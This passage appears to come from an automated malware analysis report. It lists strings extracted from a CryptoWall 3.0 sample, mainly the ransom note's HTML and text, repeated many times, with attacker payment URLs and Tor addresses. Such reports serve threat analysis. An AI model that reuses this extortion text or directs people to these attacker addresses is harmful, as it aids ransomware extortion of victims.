other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html285.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt211.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html355.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html270.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt250.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html373.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html346.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html50.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html221.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt127.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html122.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt224.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html195.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt169.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html262.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html20.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html269.2.dr String found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
